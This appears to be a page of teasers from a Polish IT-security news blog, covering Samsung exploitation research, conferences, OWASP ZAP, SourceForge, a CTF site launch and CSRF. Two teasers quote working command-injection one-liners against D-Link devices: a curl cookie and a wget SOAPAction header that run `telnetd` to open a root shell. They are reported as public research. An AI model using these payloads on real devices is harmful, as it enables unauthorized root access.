Wczoraj został opublikowany dość elektryzujący post pokazujący dokładną ścieżkę exploitacji telefonów Samsunga (Galaxy S6, Galaxy S5 oraz Note 4).
Czytaj dalej »
Już za dwa dni (18 czerwca 2015) startuje w Warszawie konferencja CyberGOV. Jest to wydarzenie kierowane typowo do instytucji publicznych, a dokładniej tych zainteresowanych szeroko pojętym bezpieczeństwem IT. W agendzie cieszy na pewno to, że organizatorzy zaprosili do wystąpienia sporo zagranicznych prelegentów – choćby Andreasa Koenena, z prezentacją: „Organizacja systemu…
Czytaj dalej »
Od jakiegoś już czasu dostępna jest nowa wersja 2.4.0 tego popularnego (i bezpłatnego) narzędzia do testowania bezpieczeństwa aplikacji webowych. Nowa wersja ZAP-a o tyle cieszy, że wydawało się już że rozwój projektu stanął (jak w przypadku innych podobnych narzędzi budowanych pod skrzydłami OWASP – przykład: Webscarab). Cały rozwój wydaje się…
Czytaj dalej »
Niedawno naszą uwagę zwrócił dostępny od dłuższego czasu na polskim rynku LinuxMagazine – a dokładnie numer z listopada 2014 roku, gdzie można było znaleźć co najmniej 3 rozbudowane artykuły związane z ITsec.
Czytaj dalej »
Ostatnio Sourceforge przejmuje na swojej platformie konta znanych projektów. Jakiś czas temu był to GIMP (tutaj SF dodawało do instalatora GIMP-a własny ad-ware/pay-ware), parę dni temu nmap (!). Dołączają też inne znane projekty, 14-czerwca wymigrował z Sourceforge Notepad++, tłumacząc to po prostu tak: SourceForge was a good place; unfortunately, sometimes…
Czytaj dalej »
Peter Adkins umieścił na githubie swoje badania nad inteligentnym gniazdkiem elektrycznym D-Linka (DSP-W110). Nie będę jeszcze raz wszystkiego przepisywał z oryginalnego researchu ;) ale odpalenie shella wygląda tu bajecznie prosto: # Spawn a root shell (telnet) curl \ –cookie „terribleness=\`telnetd -l/bin/sh\`” \ 192.168.1.3 Podobnie wygląda historia z uploadem dowolnego…
Czytaj dalej »
Zwróciła się do nas pewna firma z prośba o pewną promocję ich inicjatywy. Z naszej strony padła propozycja organizacji konkursu na rozwal.to (swoją drogą mamy tu już prawie 900 aktywnych kont!). I mamy na to zielone światło. Pula nagród, która jest tu do wykorzystania to 2 200 PLN – które…
Czytaj dalej »
Mamy dla Was relatywnie nową propozycję szkoleniową: 2-dniowe autorskie warsztaty z obszaru technicznego monitoringu bezpieczeństwa IT. Temat wydaje się być mocno na czasie, biorąc pod uwagę choćby ostatnie doniesienia kolegów z z3s.pl. Warsztaty prowadzi Przemek Skowron, wcześniej odpowiedzialny m.in. za stworzenie zespołu CSIRT dla Grupy Alior Bank. Przemek posiada już co…
Czytaj dalej »
Już 8.06.2015 na spotkaniu WrotQA (wrocławska grupa testerów) będzie można zobaczyć naszą prezentację o bezpieczeństwie aplikacji www. Na żywo pokazanych będzie kilka nietypowych (choć krytycznych) podatności w aplikacjach webowych: m.in. niedawno zlokalizowane krytyczne błędy w Nuxeo (temat ten prezentowałem po raz pierwszy tydzień temu na konferencji Confidence). Całość pokazywana będzie…
Czytaj dalej »
Zaczynamy współpracę z Programistamag (kącik ITsec) zachęcam też do zdobycia specjalnego numeru magazynu (50 stron) z opisem ciekawych CTF-ów, przygotowany przez Dragon Sector.
Czytaj dalej »
Niedługo (22-23.06.2015) rusza w Krakowie druga edycja szkolenia: Offensive HTML, SVG, CSS and other Browser-Evil. O samym szkoleniu już pisaliśmy jakiś czas temu przy okazji pierwszej edycji tego kursu. Warto tu przypomnieć, że całość prowadzi światowej renomy badacz bezpieczeństwa – Mario Heiderich. A podsumowując – jest to propozycja przeznaczona dla…
Czytaj dalej »
Prace nad rozwal.to zajęły nam więcej czasu niż się spodziewaliśmy (w sumie parę miesięcy). Dzisiaj premiera naszego serwisu CTF / hackme – czyli rozwal.to.
Czytaj dalej »
Niedawno pisaliśmy o nowych D-Linkach, a teraz pojawiło się ciekawe badanie pokazujące w jaki sposób zrealizować nieuwierzytelniony dostęp na root-a. Wystarczy jeden prosty request HTTP… wget –header=’SOAPAction: „http://purenetworks.com/HNAP1/GetDeviceSettings/`telnetd`”’ http://192.168.0.1/HNAP1 $ telnet 192.168.0.1 Trying 192.168.0.1… Connected to 192.168.0.1. Escape character is '^]’. BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh) Enter…
Czytaj dalej »
CSRF (Cross-Site Request Forgery) to chyba jedna z najmniej rozumianych podatności opisywanych w ramach słynnego projektu OWASP Top Ten. Często mylona jest z podatnością XSS, czasem również prezentowana jednocześnie z innymi podatnościami, co też zaciemnia obraz istoty problemu. Zobaczmy na kilku przykładach czym jest CSRF.
Czytaj dalej »
Nie potrzeba tu zbyt wiele komentować. Warto jednak przyznać, że oprogramowanie z tytułu notki, przy instalacji lojalnie uprzedza, że trzeba zrestartować komputer, żeby UAC wyłączył się na trwale. Ale umówmy się – kto czyta komunikaty przy instalacji oprogramowania? A co więcej, kto ze zwykłych użytkowników je rozumie? ;-) –ms
Czytaj dalej »